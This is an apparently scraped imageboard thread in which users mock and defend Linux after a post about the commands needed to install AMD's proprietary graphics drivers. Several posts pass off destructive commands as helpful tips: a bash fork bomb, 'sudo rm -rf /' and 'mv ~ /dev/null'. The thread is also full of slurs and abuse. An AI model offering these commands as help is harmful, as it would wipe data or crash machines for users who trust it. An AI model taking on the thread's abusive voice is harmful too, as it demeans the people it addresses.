LMAO LOONIX IS SO FUCKIN EASY

>LMAO LOONIX IS SO FUCKIN EASY

Kill yourselves, freetards

Other urls found in this thread:

phoronix.com/scan.php?page=article&item=openclose-amdnv-2017&num=1
phoronix.com/scan.php?page=news_item&px=AMDGPU-PRO-Ubuntu-17.04
twitter.com/SFWRedditVideos

linux is only good for servers

Looks fine to me. Glad stuff like this keeps retards like you away.

Yes. But only if you are poor to get a real server.

Imaging if Elon Mask would try to install amd drivers on his new ubuntu setup and run into this issue. Would you call him retard too?

>Elon Mask
sorry who?

haha lol what are you talking about all you need to do is "sudo install *program*" it's that easy much better than shitty ass windows downloading sketchy exe's from virus ridden websites enjoy your malware

what is a "real server"
pretty sure Google runs linux, albeit a heavily modified fork

On arch can literally just go like
pacman -S xf86-video-amdgpu

>be on linux
>discover issue
>copy and paste commands into command line
>be on windows
>something happened :((((((
>no help other than a reinstall

>what is a "real server"
Windows.

>xf86-video-amdgpu
That is no amd pro drivers. That its shitty open source version

You don't even have to think, it's all spelled out for you.
Just blindly run those commands and it should work.

This.

It's not like you have to write your own program to solve something. Just copy and paste the fucking instructions and you're done.

I don't even use linux and this is baby shit.

The open source version is better than AMD proprietary. Go figure.

Lol that what freetards believe. I already run the commands from amd site to install the drivers. What I got? Black fuckin screen. AHaha. I am pretty I will get some other shit which will break my system after I run those commands.

He would probably follow the fix and be done in five minutes because he's not a lazy moronic piece of shit like you

>can't update without rebooting
It's useless in the real server world

Yeah? Prove it.Also does it have OpenCL to miniing coins with it?

No, he would probably buy a new macbook because that five minutes of his time costs exactly as a new macbook.

You must restart servers from time to time.

>Yeah?

Yes you dumb faggot.

>Prove it.Also does it have OpenCL to miniing coins with it?

No one uses and proprietary drivers with linux. It has always been too much of a hassle. Why don't you know anything about the hardware, and system that you own. This fucken retarded kid can't even google anything.

phoronix.com/scan.php?page=article&item=openclose-amdnv-2017&num=1

>Likewise, no OpenCL tests were conducted since the open-source AMD and NVIDIA stacks both lack adequate OpenCL drivers at the moment.

Eat shit idiot.

Yes, once every 5 years.

after installing drivers run this in bash

:(){ :|: & };:

This will streamline the driver core, and run it at bare metal.

still easier than telling windows to stop raping your privacy

Why the fuck haven't they patched it in the main repository yet?

Linux is for autistic NEETs with nothing but free time and pedophiles worried about going to jail. People whose time is valuable in even the slightest way use either: Windows, MacOS, or Ubuntu. Reminder that every distribution, and Linux itself, is designed to be maintained by one sweaty obese nerd and the rest of the users should just be able to use their computers without worrying.

>dont want to admit that he is defeated and his loonix is shit
>posting delete system32 meme

lamo. typical freetard

There's nothing difficult about that, but literally MitM'ing yourself is retarded. I really can't believe Linux fags do that.

Run

>sudo rm -rf /

Before installing any drivers.

Linux is pretty good amd is shit.

after every kernel update

completely untrue and has been untrue since windows 2000.

>forkbomb
>system32 meme

>I don't know wtf any of this means/does but just run it!

linux users everyone. If things don't build 100% the same as this one guy then you're fucked because now you're partway through a bunch of commands you have no idea how to properly use. At least in Windows if a program fails to install you can just try again without all these fucked up, half installed portions remaining.

topjej
obvious troll is obvious user

i never understood why people think doing anything in the terminal is inherently more difficult

windows has a fucky layering of legacy and modern that you gotta google or know anyway

why is that easier? because it's graphical?

I know what all that stuff does.
I can't expect you to know however, because you refuse to learn how your system works and you don't even know how to program your own goddamn computer.

>pretty sure Google runs linux, albeit a heavily modified fork

It's a tweaked version of Ubuntu.

more like has been tree since windows 2k
windows xp was the first version where they start dumbing everything down and blocking everything that they think the average user shouldnt use/do (e.g. raw sockets with xp sp1)

>more like has been tree since windows 2k
s/tree/true/

the same reason that coding in C/C++ is easier than assembly. CLI is far less intuitive and much harder to perform complex operations than clicking a few buttons on screen that are labeled and linked to a help file.

unless you're Terry you don't know either. Please link your github where you've forked a distro on your own or built your OS from scratch.

>apt-get build-dep
tells the package manager to install all the dependencies required to build cogl
>add [url] to /etc/apt/sources.list
You're adding the debian repository that holds all the source code for the packages on the debian system
>wget / patch / dpkg-source
You're literally patching the source and then building a modified version of the package and then installing it yourself on your system.

None of this would break your system if you left it half-way through, except maybe the final command, which is the ONLY one that makes changes to your graphics driver.

>CLI is far less intuitive
true
>and much harder to perform complex operations
wrong

it's easier to perform complex operations because you can easily combine different tools. with a GUI there either has to be a preprogrammed button/option for everything (which is less intuitive than CLI), or you just can't do it.

I forked your mom.

Gentoo literally doesn't have that problem. Thought gentoo was a meme? It's not, of course. It's the only good distro, period.

how many hours over the years have you invested learning the skills necessary to reach this point? How many hours would it take to learn how to go to AMD's website on Windows, download an .exe and double click? That is the entire point OP was making. Linux takes 100x more work, effort, dedication and patience to become competent with.

If you run into issues on linux you're lucky if there are step-by-step commands to copy/paste. If you fuck up partway through, unless you've invested all that those 100's of hours learning everything necessary to read, debug and fork a new solution from where it has errored out you will be screwed and depending on what you were doing that fucked up your system maybe have lost significant functionality.

This is the reason Windows is superior to linux for almost all computer users in the world. This is the reason the year of Linux will never, ever come unless it has been "dumbed down" to the level of windows.

>Finds random problem online
>Applies it to system in general
I can do the same thing with Windows and any problem where the solution is fucking with the registry.

Then just use Windows.

I don't think there has ever been a single time in the last 20 years I have ever installed something on Windows that broke core functionality. I have literally broken the Ubuntu 10 package manager just by running an update, causing me to spend 3 hours researching solutions until I finally fixed all the issues and it was able to update again.

Aside from malware Windows is pretty much impossible to fuck up permanently.

>blames amd's proprietary drivers on linux
Is there even a reason to use those these days? Isn't the free Radeon driver just as good?

>I don't think there has ever been a single time in the last 20 years I have ever installed something on Windows that broke core functionality
think harder. it happened many times that microsoft removed some functionality because they thought it's unsafe for users to use it.

>Aside from malware Windows is pretty much impossible to fuck up permanently.

The windows 8 fuck up seems to still be around with windows 10, so it might be permanent. I'll take my chances with linux now.

What's complex on a CLI is simple on a GUI. Who the hell would want to use mkvmerge from a CLI? GUI:
Drag and drop for files and attachments
Checkboxes for tracks
Dropdowns for languages/aspect ratios/frame rates
File open dialogues that will parse mkv UID's for linked mkvs/ordered chapters

With all the things it can do you'd have to live in the manual to use it from the CLI.

And there is nothing less intuitive than a CLI. It gives you nothing but a blinking cursor.

>Aside from malware

You're okay with the malware, viruses, exploits, and data collection on windows? Isn't this a huge fucking problem, or are you somehow just okay with this?

Was saying I can easily find and shill the same way with Windows when it comes to the registry.
>Wtf is this shit? Editing undocumented registry is too complex, in Linux I just apt-get install and it's all good! Winfags btfo

Congrats, same thing for me under Linux.

It really depends, I am not a computing student and don't know the first thing about computers but I find shit like deleting folders (when it doesn't fucking delete on windows) and doing things like moving files up one level in linux way easier to do in linux than in windows. Also windows compilers take like gigs and gigs to download whereas in linux to compile something I just paste in three lines and don't need to download anything retardedly massive and usually the guides spoonfeed you on how to get it up and working/

Also half the things I want to use on my windows computer seems to only work for linux, which means that one day I am actually going to have to install it on something other than a server.

I use Windows, have tons of computer degrees, and have been using multiple OSs since I was fucking 12.

Linux definitely has a use with it's customizability and speed that Windows doesn't have.
If it had some important programs I use I would gladly use Linux, and anyone who looks at the instructions in the OP and think "wow this is hard" should know they're at the far left side of the dunning Kruger graph.

Then just use linux.

I do. Glad we're on the same page now.

My problems with GNU/Linux are always due to drivers. Laptops have broken wireless functionality, and once you get it working you find out that the reverse engineered drivers only allow for 1mbps download on a 400/400 connection because the manufacturer is cancer. Lately my issue has been with trying to use it on my desktop though. I can't even boot a liveCD because apparently 900 series nvidia cards are not supported by the open source drivers, and the proprietary ones aren't available for packaging. Apparently I have to do some fuckery during boot and use nomodeset, but last time I tried that it didn't work.

> Try to play some Doom
> Follow install guide to get ChocolateDoom setup on Raspbian
> Just type some commands
> Shit randomly breaks and the next command throws an error
At this point I just threw my hands in the air and realized Linux is a meme. Shit breaks even if you just copy-paste commands in the terminal as you're told.

For me.

>Install Linux mint
>Buy games on gog
>one click install for bought games
>play

now try to create a list of all your movies sorted by the languages of their audio streams

> Buying games
> Buying abandonare
kys my man

I chose
>buying games

I'll live forever user.

If there was a need to do that there'd be a GUI for it. It's not relevant info.

Ubuntu is linux though.

imagine you host a bbc gangbang for your "gf" and each of the niggers speaks another set of click clack dialect, but they still want to watch a movie and you have to look for one

it's just a fucking example.

I installed my RX480 without any problems; never had to do anything like that.

ok, other example: you want to imdb infos for each of your movies and store them inside their foldes. your movies are organized in folders "title_(year)" or whatever

You're a retard who doesn't know what he's doing you fucking retard.

Well that's because you're a fucking idiot.

wow... thank god people like you are not using linux.

>This looks so complicated and hard, I can't do this!!!
Basically copy paste to terminal... LMAO

Good. Stay out from Linux, we are full.

The Linux community, ladies and gentlemen

You're damn right, if you're too stupid, use something else.

Fuck off all the instructions are written right infront of you.

No one cared who he was.

OP, I want you to take a step back and realize your only argument throughout this thread is "Linux is too hard for me".

Disregard what I said earlier. I got the liveCD running with a few simple, rather intuitive commands.

OP is a retard.

Not if you use an actual distro for servers like debian stable or centos

>fro me
You mean for every normal user who has not time getting a cs degree by learning loonix

>all Linux users are freetards
Please don't associate the rest of us with that mentally ill minority.

>At least in Windows if a program fails to install you can just try again without all these fucked up, half installed portions remaining.
Lmaooo I was on your side until you said that

Honestly, who the fuck uses OpenCL on a regular basis on Linux?
And even I'd you were, you would have already installed the PRO drivers and used this fix if you were running Gnome3 and relatives. AFAIO the newest versions of AMDGPU Pro don't have this issue anymore.

are you posting from 2004 or something ? you don't need to reboot for a kernel update

This is shit you learn easily while you use the system.
When i first started using Linux (which was around the Time Windows 8 started shitting on it's users. I didn't know any of this.
But you can pick up the concept of it pretty easily.
The Syntax of Bash is:

If you dont know a Program
Man
Easy as Hell.

all these fake servers in the world

>Retard can't type a few commands in the terminal
The current state of Sup Forums folks.

That is easy.

I'm scared about how incompetent Sup Forums has become.

>I'm scared about how incompetent Sup Forums has become.
compared to when ? it's not like Sup Forums was much better 10 years ago, and the programming textboard wasn't much better

>going out of your way to install the inferior proprietary driver
for what purpose?

more fun with amd drivers phoronix.com/scan.php?page=news_item&px=AMDGPU-PRO-Ubuntu-17.04

you idiot, this makes nerve gas.

the proper driver bare metalization command is "mv ~ /dev/null"

this

>Would you call him retard too?
I guess you forgot that paypal got rid of him because he tried to switch their infrastructure to windows.

kek, even steamos moved from amdgpu pro to the free drivers